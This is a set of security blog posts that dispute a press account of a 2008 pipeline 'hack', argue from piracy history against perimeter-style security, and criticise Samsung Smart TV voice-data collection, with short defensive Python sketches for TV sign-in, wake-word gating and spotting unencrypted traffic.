Also what’s the real value of this statement? As a crisis with Russia unfolds, we see Russia being more active/targeted. Ok, but what does this tell us about August 2008? No connection is made. Reader is left guessing.

Bloomberg: The keyboard was the better weapon.

Robert Lee: The entire article is focused on anonymous sources. In addition, the ‘central element of the attack’ was the computer intrusion which was analyzed by incident responders. Unfortunately, incident response in industrial control systems is at such a juvenile state that even if there were a lot of data, which there never is, it is hard to determine what it means. Attribution is difficult (look at the North Korea and Sony case where much more data was available including government level resources). This story just doesn’t line up.

When journalism reports on something it acknowledges would be history changing, better information is needed. When those reports stand to increase hype and tension between nation-states in already politically tense times (Ukraine, Russia, Turkey, and the U.S.), not including actual evidence is just irresponsible.

Me: Agree. It reads like a revision of history, so perhaps that’s why we’re meant to believe it’s “history changing.” I’m ready to see evidence of a hack yet after six years we have almost nothing to back up these claims. There is better detail about what happened from journalists writing at the time.
Also if we are to believe the conclusion that keyboards are the better weapon, why have two people walking along the pipeline and why bomb infrastructure afterwards? Would Russia send a letter after making a phone call? I mean, if you look carefully at what Georgia DID NOT accuse Russia of, it was hacking critical infrastructure.
Lack of detailed evidence, anonymous attribution, generic/theoretical statements about infrastructure vulnerability, no contextual explanations…there is little here to believe the risk was more than operational errors coupled with a PKK targeted campaign against pipelines.

Posted in Energy, History, Security.


Eventually Navies Take Over

I attended a “keynote” talk at a security conference a few years ago with this title as a key premise. You know how I love history, so I was excited. The speaker, a well-regarded mathematician, told us “eventually, navies take over” because they will “perform tight surveillance of sea lanes and ensure safety for commerce”.

That sounded counter-factual to me, given what history tells us about rigid empires trying to oppress and control markets. So while I enjoyed the topic, I noted some curious issues with the presentation’s perspective.

Common sense tells me authorities have historically struggled to stem a shift to nimbler, lighter and more open commerce lanes. Authoritarian models struggle for good reasons. Shipping routes protected by a navy are basically a high tax that does not scale well, requiring controversial forms of “investment”.

This comes up all the time in security history circles. A “security tax” becomes an increasing liability because scaling perimeters is hard (the same way castles could not scale to protect trade on land); an expensive perimeter-based model, as it grows, actually helps accelerate the demise of the empire that wants to stay in power. Perhaps we could even say navies trying to take over is the last straw for an enterprise gasping to survive as cloud services roll in…

Consider that the infamous Spanish navy “flota” model — a highly guarded and very large shipment — seems an expensive disaster waiting to happen. Its failure is not in an inability to deliver stuff from point A to B. The failure is in sustainability; an inability to stop competitive markets from forming with superior solutions (like the British version that came later trying to prevent American encroachment). The flota was an increased cost to maintain a route, which obsoleted itself.

Back to the keynote presentation: it pointed out that an attacker (e.g. the British) could make a large haul. This seems an odd point to make. Such a large haul was the effect of the flota, the perimeter model. There was a giant load of assets to be attacked, because it was an annual batch job. The British could take a large haul if they won, by design.

In defense of the flota model, the frequency of failure was low over many years. If we measured success simply on whether some shipments were profitable then it looks a lot better. This seems to me like saying Blockbuster was a success so eventually video rental stores (brick-and-mortar) take over. It sounds like going backwards in time not forward. The Spanish had a couple hundred years of shipments that kept the monarchy running, which may impress us just like the height of Blockbuster sales. To put it in infosec terms, should we say a perimeter model eventually will take over because it was used by company X to protect its commerce?

On the other hand the Eighty Years’ and Thirty Years’ wars that Spain lost put the flota timeline in a different perspective. Oppressive extraction and taxes to maintain a navy that was increasingly overstretched and vulnerable, a period of expensive wars and leaks…in relative terms, this was not exactly a long stretch of smooth sailing.

More to the point, in peacetime the navy simply could not build a large enough presence to police all the leaks to pervasive draconian top-down trading rules. People naturally smuggled and expanded around navies or when they were not watching. We saw British and Dutch trade routes emerge out of these failures. And in wartime a growth in privateers increased difficulty for navies to manage routes against competition because the navy itself was targeted. Thus in a long continuum it seems we move towards openness until closed works out a competitive advantage. Then openness cracks the model and out-competes until…and so on. If we look at this keynote’s lesson from a Spanish threat to “take over” what comes to mind is failure; otherwise wouldn’t you be reading this in Spanish?

Hopefully this also puts into context why by 1856 America refused to ban “letters of marque” (despite European nations doing so in the Paris Declaration). US leadership expressly stated it would never want or need a permanent/standing navy (it believed privateers would be its approach to any dispute with a European military). The young American country did not envision having its own standing navy perhaps because it saw no need for the relic of unsustainable and undesirable closed markets. The political winds changed quite a bit for the US in 1899 after dramatic defeats of Spain but that’s another topic.

The conference presentation also unfortunately used some patently misleading statements like “pirates that refused to align with a government…[were] eventually executed”. I took that to mean the presenter was saying a failure to choose to serve a nation, a single one at that, would be a terminal risk for any mercenary or pirate. And I don’t believe that to be true at all.

We know some pirates, perhaps many, avoided being forced into alignment through their career and then simply retired on terms they decided. Peter Easton, a famous example, bought himself land with a Duke’s title in France. Duke Easton’s story has no signs of coercion or being forced to align. It sounds far more like a retirement agreement of his choosing. The story of “Wife of Cheng” is another example. Would you call her story the alignment of a pirate with a government, or a government aligning with the pirate? She clearly refused to align and was not executed.

Cheng I Sao repelled attack after attack by both the Chinese navy and the many Portuguese and British bounty hunters brought in to help capture her. Then, in 1810, the Chinese government tried a different tactic — they offered her universal pirate amnesty in exchange for peace.

Cheng I Sao jumped at the opportunity and headed for the negotiating table. There, the pirate queen arranged what was, all told, a killer deal. Fewer than 400 of her men received any punishment, and a mere 126 were executed. The remaining pirates got to keep their booty and were offered military jobs.

Describing pirates’ options as binary align-or-be-executed is crazy when you also put it in the frame of carrying dual or more allegiances. One of the most famous cases in American history involves ships switching flags to the side winning at sea in order to get a piece of the spoils on their return to the appropriate port. The situation, in brief, unfolded (pun not intended) when two American ships came upon an American ship defeating a British one. The two approaching ships switched to British flags, chased off the American, took the British ship captive, switched flags back to American and split the reward from America under “letters of marque”. Eventually in court the wronged American ship proved the situation and credit was restored. How many cases went unknown?

After his talk the presenter backed away from defending the facts behind his conclusions. He said he had just read navy history lightly and was throwing out ideas for a keynote, so I let it drop as he asked. A shame, really, because I had been tossing out some thoughts on this topic for a while and it seems like a good foundation for debate. Another point I would love to discuss some day in terms of cybersecurity is why so many navy sailors converted to being pirates (hint: more sailors died transporting slaves than slaves died en route).

My own talks on piracy and letters of marque were in London, Oct 2012, San Francisco, Feb 2013 and also Mexico City, Mar 2013. They didn’t generate much response so I did not push the topic further. Perhaps I should bring them back again or submit updates, given how some have been talking about national concerns with cyber to protect commerce.

If I did present on this topic again, I might start with an official record of discussion with President Nixon, February 8, 1974, 2:37–3:35 p.m. It makes me wonder if the idea “eventually navies take over” actually is a form of political persuasion, a politicized campaign, rather than any sort of prediction or careful reflection on history:

Dr. Gray: I am an old Army man. But the issue is not whether we have a Navy as good as the Soviet Union’s, but whether we have a Navy which can protect commerce of the world. This is our #1 strategic problem.

Adm. Anderson: Suppose someone put pressure on Japan. We couldn’t protect our lines to Japan or the U.S.-Japan shipping lanes.

The questions I should have asked the keynote speaker were not about historic accuracy or even the role of navies. Instead perhaps I should have gone straight to “do you believe in authoritarianism (e.g. fascism) as a valid solution to market risks”?

Posted in History, Sailing, Security.


Samsung TV: Would You Trust It?

Samsung is in a bit of a pickle. They want people to know that “voice recognition feature is activated using the TV’s remote control”. But let’s face it: their disclaimer/warning that comes with a TV gave away the real story:

You can control your SmartTV, and use many of its features, with voice commands.

If you enable Voice Recognition, you can interact with your Smart TV using your voice. To provide you the Voice Recognition feature, some voice commands may be transmitted (along with information about your device, including device identifiers) to a third-party service that converts speech to text or to the extent necessary to provide the Voice Recognition features to you. In addition, Samsung may collect and your device may capture voice commands and associated texts so that we can provide you with Voice Recognition features and evaluate and improve the features. Please be aware that if your spoken words include personal or other sensitive information, that information will be among the data captured and transmitted to a third party through your use of Voice Recognition.

Nice attempt at raising awareness. Kudos for that. The first thing that jumps out at me is how vague the terms are. Second, I noticed that controls appear to be weak, or at least buried in a menu somewhere (“activated using your remote!” is basically meaningless). Third, Samsung clearly tries to dissuade you from disabling voice monitoring.

If you do not enable Voice Recognition, you will not be able to use interactive voice recognition features, although you may be able to control your TV using certain predefined voice commands. While Samsung will not collect your spoken word, Samsung may still collect associated texts and other usage data so that we can evaluate the performance of the feature and improve it.

You may disable Voice Recognition data collection at any time by visiting the “settings” menu. However, this may prevent you from using all of the Voice Recognition features.

So that’s a warning that your data can go somewhere, who knows where. On the other hand if you disable data collection you may be prevented from using all the features. Don’t you want all the features? Awful choice we have to make.

Samsung product management should be held accountable for a triad of failures. Really, a TV product manager should be in serious hot water. It is embarrassing in 2015 for a consumer product company of any size to make this large a mistake. We faced these issues at Yahoo product security ten years ago and I am seriously disappointed in Samsung. That also is why I find growing public outrage encouraging.

Yahoo! 2006 “Connected Life” Internet TV device

At Yahoo we had a large team focused on user privacy and safety. Research on Internet TV found novelty in a shared device with individual user privacy needs. On the mobile phone product managers could tell me “there is always only one user” and we would debate multi-user protections. But on the TV, oh the TV was different: multi-user risks were obvious to product managers and it was easy for them to take notice. The outrage against Samsung was easily predictable and avoidable.

Take for example typing your password on a big screen menu in front of a room. Everyone can see. The solution I created a decade ago was based on a simple concept: move user information to a disposable/agile security model instead of an expensive/static one. We developed a throwaway token option to register an account on the big screen instead of asking for a sensitive password.

Type your password into a private system, such as a laptop or phone, and the system sends you a number. You enter that number into the TV. Doesn’t matter if anyone sees the number. That was 2006 as we worked with TV manufacturers on how to keep data in public rooms on shared devices private. Yahoo dominated the Internet share of accounts (2 billion users) around this time so nearly every manufacturer would come through our process. Thus we could try to consult with them before bad code or devices were released.
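The throwaway-token flow described above can be sketched in a few lines. To be clear, this is my hypothetical reconstruction of the idea, not Yahoo's actual implementation; the function names, six-digit format and five-minute expiry are all assumptions:

```python
import secrets
import time

TOKEN_TTL_SECONDS = 300  # assumed expiry: the code is disposable after five minutes

_pending = {}  # code -> (account, issued_at); in-memory store for the sketch

def issue_code(account: str) -> str:
    """Called by the trusted private device (laptop/phone) after normal
    password authentication succeeds. Returns a short-lived numeric code."""
    code = f"{secrets.randbelow(10**6):06d}"  # six digits, safe to show on a big screen
    _pending[code] = (account, time.time())
    return code

def redeem_code(code: str):
    """Called by the TV. Single use: the code is consumed on first redemption.
    Returns the account name, or None if unknown, reused or expired."""
    entry = _pending.pop(code, None)
    if entry is None:
        return None
    account, issued_at = entry
    if time.time() - issued_at > TOKEN_TTL_SECONDS:
        return None  # expired; the user must request a fresh code
    return account
```

The number typed on the big screen is worthless to an onlooker: it is single-use, short-lived, and reveals nothing about the password — exactly the disposable/agile model described above.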

Samsung should have thought this through better on their own by now. For example, commands used for the TV could require a keyword to “markup” listening, such as “Hello Samsung” and “Goodbye”. That phrase is basically never going to come up in casual conversation. Phones already do this. Remember CB radio? Lots of good verbal markup ideas there, and who wouldn’t enjoy talking to their TV like a trucker?
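The keyword “markup” idea amounts to a tiny state machine over recognized utterances: nothing is buffered or transmitted unless the user has explicitly opened a listening window. A minimal illustrative sketch (the phrases and function name are hypothetical, not any real Samsung API):

```python
# Assumed wake/stop phrases from the paragraph above, for illustration only.
WAKE_PHRASE = "hello samsung"
STOP_PHRASE = "goodbye"

def gate_transcript(utterances):
    """Return only the utterances spoken while listening was explicitly on.
    Everything outside the wake/stop window is dropped, never captured."""
    listening = False
    captured = []
    for u in utterances:
        phrase = u.strip().lower()
        if phrase == WAKE_PHRASE:
            listening = True        # explicit opt-in to capture
        elif phrase == STOP_PHRASE:
            listening = False       # explicit opt-out
        elif listening:
            captured.append(u)      # only windowed speech is kept
    return captured
```

With this gate, a private conversation held before “Hello Samsung” or after “Goodbye” simply never enters the pipeline that ships data to a third party.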

Also important is a visual indication that the TV is listening, such as an annoyingly bright LED that can’t be missed. And third, a physical disable switch with tactile and visual feedback would be nice, like switching off an old Marshall amplifier. Perhaps a switch on the remote or a button that lights up like a big red “recording” indicator. And this doesn’t even get into fun answers to how the data is protected in memory, storage and over the wire.

Unfortunately Samsung just gave themselves a black eye instead. I would not buy another product from them until I have hard evidence their product management runs through a legitimate security team/review process. In fact I am now disposing of the Samsung device I did own and there’s a very high chance of migrating to another manufacturer.

Just for some comparison, notice how the camera and facial recognition were described:

Vague:

Your SmartTV is equipped with a camera that enables certain advanced features, including the ability to control and interact with your TV with gestures and to use facial recognition technology to authenticate your Samsung Account on your TV. The camera can be covered and disabled at any time, but be aware that these advanced services will not be available if the camera is disabled.

Specific:

The camera situated on the SmartTV also enables you to authenticate your Samsung Account or to log into certain services using facial recognition technology. You can use facial recognition instead of, or as a supplementary security measure in addition to, manually inputting your password. Once you complete the steps required to set up facial recognition, an image of your face is stored locally on your TV; it is not transmitted to Samsung. If you cancel your Samsung Account or no longer desire to use facial recognition, please visit the applicable settings menu to delete the stored image. While your image will be stored locally, Samsung may take note of the fact that you have set up the feature and collect information about when and how the feature is used so that we can evaluate the performance of this feature and improve it.


Updated Feb 23: David Lodge has dumped the network traffic and proved that it is indeed capturing and sending unencrypted text to Samsung. He writes:

What we see here is not SSL encrypted data. It’s not even HTTP data, it’s a mix of XML and some custom binary data packet.

The sneaky swines; they’re using 443/tcp to tunnel data over; most likely because a lot of standard firewall configurations allow 80 and 443 out of the network. I don’t understand why they don’t encapsulate it in HTTP(S) though.

Anyway, what we can see is it sending a load of information over the wire about the TV, I can see its MAC address and the version of the OS in use. After the word buffer_id is a load of binary data, which looks audio-ish, although I haven’t delved further into it yet.

Then, right at the bottom, we have the results:

sneaky swines
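Lodge’s core finding — traffic on 443/tcp that is not actually SSL — is easy to check mechanically, because a TLS session opens with a handshake record whose first bytes follow a fixed pattern. Here is a minimal heuristic sketch of that check (my own illustration, not code from Lodge’s write-up):

```python
def looks_like_tls(first_bytes: bytes) -> bool:
    """Heuristic: a TLS connection opens with a Handshake record — content
    type 0x16 followed by a 0x03,0x0X protocol version (SSL 3.0 through
    TLS 1.3). Plain XML or a custom binary protocol tunneled over port 443
    fails this check on the very first packet."""
    if len(first_bytes) < 3:
        return False
    return (first_bytes[0] == 0x16       # record type: Handshake
            and first_bytes[1] == 0x03   # version major byte
            and first_bytes[2] <= 0x04)  # version minor byte, 0x00-0x04
```

Run against the first bytes a client sends, this immediately flags the kind of unencrypted XML-plus-binary stream the packet dump showed: using port 443 alone buys firewall traversal, not confidentiality.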

Posted in Security.